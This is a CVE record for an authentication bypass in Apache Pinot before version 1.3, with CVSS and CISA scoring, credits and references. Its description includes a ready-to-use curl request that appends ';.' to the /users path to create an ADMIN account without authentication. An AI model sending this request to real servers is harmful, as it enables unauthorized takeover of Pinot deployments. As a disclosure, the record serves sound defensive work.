{"dataType":"CVE_RECORD","dataVersion":"5.1","cveMetadata":{"cveId":"CVE-2024-56325","assignerOrgId":"f0158376-9dc2-43b6-827c-5f631a4d8d09","state":"PUBLISHED","assignerShortName":"apache","dateReserved":"2024-12-19T14:28:37.532Z","datePublished":"2025-04-01T09:07:14.185Z","dateUpdated":"2025-10-27T17:11:08.160Z"},"containers":{"cna":{"affected":[{"defaultStatus":"unaffected","packageName":"org.apache.pinot.controller.api","product":"Apache Pinot","vendor":"Apache Software Foundation","versions":[{"lessThan":"1.3","status":"affected","version":"0","versionType":"maven"}]}],"credits":[{"lang":"en","type":"finder","value":"75Acol at Huawei"},{"lang":"en","type":"finder","value":"fcgboy at Huawei"},{"lang":"en","type":"finder","value":"wk2025 at Huawei"},{"lang":"en","type":"finder","value":"leo at Huawei"}],"descriptions":[{"lang":"en","supportingMedia":[{"base64":false,"type":"text/html","value":"<b>Authentication Bypass Issue</b><br><br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">If the path does not contain / and contain., authentication is not required.<br><br><b>Expected Normal Request and Response Example</b><br><br><span style=\"background-color: rgba(29, 28, 29, 0.04);\">curl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"} <a target=\"_blank\" rel=\"nofollow\" href=\"http://{server_ip}:9000/users\">http://{server_ip}:9000/users</a><br><br>\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}</span><br><br><br><b>Malicious Request and Response Example</b> <br><br>curl -X POST -H \"Content-Type: application/json\" -d '{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}'<b> </b><a target=\"_blank\" rel=\"nofollow\" href=\"http://{serverip}:9000/users;\"><b>http://{serverip}:9000/users;</b></a><b>.</b><br><br>\nReturn: {\"users\":{}}\n<br><br>\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot.</span><br><br>"}],"value":"Authentication Bypass Issue\n\nIf the path does not contain / and contain., authentication is not required.\n\nExpected Normal Request and Response Example\n\ncurl -X POST -H \"Content-Type: application/json\" -d {\\\"username\\\":\\\"hack2\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}  http://{server_ip}:9000/users \n\n\nReturn: {\"code\":401,\"error\":\"HTTP 401 Unauthorized\"}\n\n\nMalicious Request and Response Example \n\ncurl -X POST -H \"Content-Type: application/json\" -d '{\\\"username\\\":\\\"hack\\\",\\\"password\\\":\\\"hack\\\",\\\"component\\\":\\\"CONTROLLER\\\",\\\"role\\\":\\\"ADMIN\\\",\\\"tables\\\":[],\\\"permissions\\\":[],\\\"usernameWithComponent\\\":\\\"hack_CONTROLLER\\\"}'  http://{serverip}:9000/users; http://{serverip}:9000/users; .\n\n\nReturn: {\"users\":{}}\n\n\n\n \n\nA new user gets added bypassing authentication, enabling the user to control Pinot."}],"metrics":[{"other":{"content":{"text":"critical"},"type":"Textual description of severity"}}],"problemTypes":[{"descriptions":[{"cweId":"CWE-288","description":"CWE-288 Authentication Bypass Using an Alternate Path or Channel","lang":"en","type":"CWE"}]}],"providerMetadata":{"orgId":"f0158376-9dc2-43b6-827c-5f631a4d8d09","shortName":"apache","dateUpdated":"2025-10-27T17:11:08.160Z"},"references":[{"tags":["vendor-advisory"],"url":"https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v"}],"source":{"discovery":"EXTERNAL"},"title":"Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required","x_generator":{"engine":"Vulnogram 0.2.0"}},"adp":[{"title":"CVE Program Container","references":[{"url":"http://www.openwall.com/lists/oss-security/2025/03/27/8"}],"providerMetadata":{"orgId":"af854a3a-2127-422b-91ae-364da2661108","shortName":"CVE","dateUpdated":"2025-04-01T10:03:56.094Z"}},{"metrics":[{"cvssV3_1":{"scope":"UNCHANGED","version":"3.1","baseScore":9.8,"attackVector":"NETWORK","baseSeverity":"CRITICAL","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","integrityImpact":"HIGH","userInteraction":"NONE","attackComplexity":"LOW","availabilityImpact":"HIGH","privilegesRequired":"NONE","confidentialityImpact":"HIGH"}},{"other":{"type":"ssvc","content":{"timestamp":"2025-04-18T14:23:26.095702Z","id":"CVE-2024-56325","options":[{"Exploitation":"none"},{"Automatable":"yes"},{"Technical Impact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}}],"title":"CISA ADP Vulnrichment","providerMetadata":{"orgId":"134c704f-9b21-4f2e-91b3-4a467353bcc0","shortName":"CISA-ADP","dateUpdated":"2025-04-18T14:24:14.801Z"}}]}}